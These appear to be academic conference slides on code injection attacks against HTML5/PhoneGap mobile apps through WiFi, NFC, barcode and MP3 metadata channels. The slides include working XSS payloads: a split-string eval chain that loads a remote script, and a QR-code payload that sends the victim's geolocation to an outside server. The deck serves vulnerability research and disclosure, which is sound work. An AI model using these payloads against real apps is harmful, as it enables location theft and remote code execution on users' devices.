Add to collection(s) Add to saved
  1. Engineering & Technology
  2. Electrical Engineering

Code Injection Attacks on HTML5

advertisement 
Xing Jin, Tongbo Luo, Derek G. Tsui,
Wenliang Du
Department of Electrical Engineering & Computer Science
Syracuse University
.
(a)
(e)
(b)
(c)
(d)
(f)
(g)
(h)
Outline
 BackGround



Overview of HTML5-based Mobile App
Overview of PhoneGap Architecture
Risks in JavaScript
 Code Injection Attacks on HTML5-based mobile apps




Overview of the Attack
Channels of the Attack
Examples (WIFI, NFC, MP3)
Length limitation
 Real Vulnerable Cases
 Future Work
Overview of HTML5-based Mobile App
WebView
PhoneGap
addJavascriptInterface()
HTML
CSS
JavaScript
X
X
Device
•Accelerometer
•Camera
•Compass
•Contacts
•File
•Geolocation
•Notification
…
Advantage:
Can be easily
ported between
different platforms
Overview of PhoneGap Architecture
Risks in JavaScript
 Data and code can be mixed together.
var text="Hello!<script>alert('hello')</script>";
document.write(text);
 Once it runs, the data will be displayed, and the JavaScript code will also
be executed.
Overview of the Attack
Overview of the Attack
2
3
1
Channels of XDS Attack
 ID Channels (WiFi, Bluetooth)
 Data Channels Unique to Mobile Devices (NFC, Barcode, SMS)
 Metadata Channels (MP3, MP4, Image)
Example 1(WiFi)
Non PhoneGap WiFi-Finder
PhoneGap WiFi-Finder
Example 2(NFC)
Non PhoneGap NFC App
PhoneGap NFC App
Example 3(mp3)
http://www.cis.syr.edu/~wedu/attack
Non PhoneGap Mp3 App
PhoneGap Mp3 App
Length Limitation of Channels
Overcome the limitation
•
Use External JS files:
<script src=//mu.gl></script> ( will be filter out by innerHTML)
• Split JS code into pieces:
<img src onerror=$.getScript('http://mu.gl')> (need to use jQuery)
1 <img src onerror=a="$.getScr">
2 <img src onerror=b="ipt('ht">
3 <img src onerror=c="tp://mu.">
4 <img src onerror=d="gl')">
5 <img src onerror=eval(a+b+c+d)>
Real vulnerable cases
 Downloaded 764 PhoneGap apps from Google Play
 Find several vulnerable apps satisfy two attack conditions:
• read external data from the channels that we have identified
• use vulnerable APIs or attributes to display information from the channels
Real Vulnerable Cases
Non PhoneGap App
PhoneGap App
Information sent to Sever
Real vulnerable Cases
The code injected in the QR code
<img src=x onerror=
navigator.geolocation.watchPosition(
function(loc){
m='Latitude:'+loc.coords.latitude+
'\n'+'Longitude:'+loc.coords.longitude;
alert(m);
b=document.createElement('img');
b.src='http://128.230.213.66:5556?c='+m })>
Future Work
 Large Scale analysis of HTML5-based mobile apps
 Solution to address the attack
Thanks!
Q&A
Related documents
PhoneGap for Library Apps
PhoneGap for Library Apps
HybridAppSec
HybridAppSec
slides - Computing and Information Studies
slides - Computing and Information Studies
Title: 2ND Open uMobile call Date: Thursday 7 November, 2013 at
Title: 2ND Open uMobile call Date: Thursday 7 November, 2013 at
Phonegap Presentation
Phonegap Presentation
PhoneGap - mobile
PhoneGap - mobile
Developing downloadable mobile apps using HTML5 and PhoneGap
Developing downloadable mobile apps using HTML5 and PhoneGap
Realistic assessment of hybrid app development
Realistic assessment of hybrid app development
Teaching Standards-Based, Accessible Web Design
Teaching Standards-Based, Accessible Web Design
poster_Lets_go. - TU Delft Institutional Repository
poster_Lets_go. - TU Delft Institutional Repository
HTML Review - My Course Web Page!
HTML Review - My Course Web Page!
slides - jQuery Bulgaria
slides - jQuery Bulgaria
Download
advertisement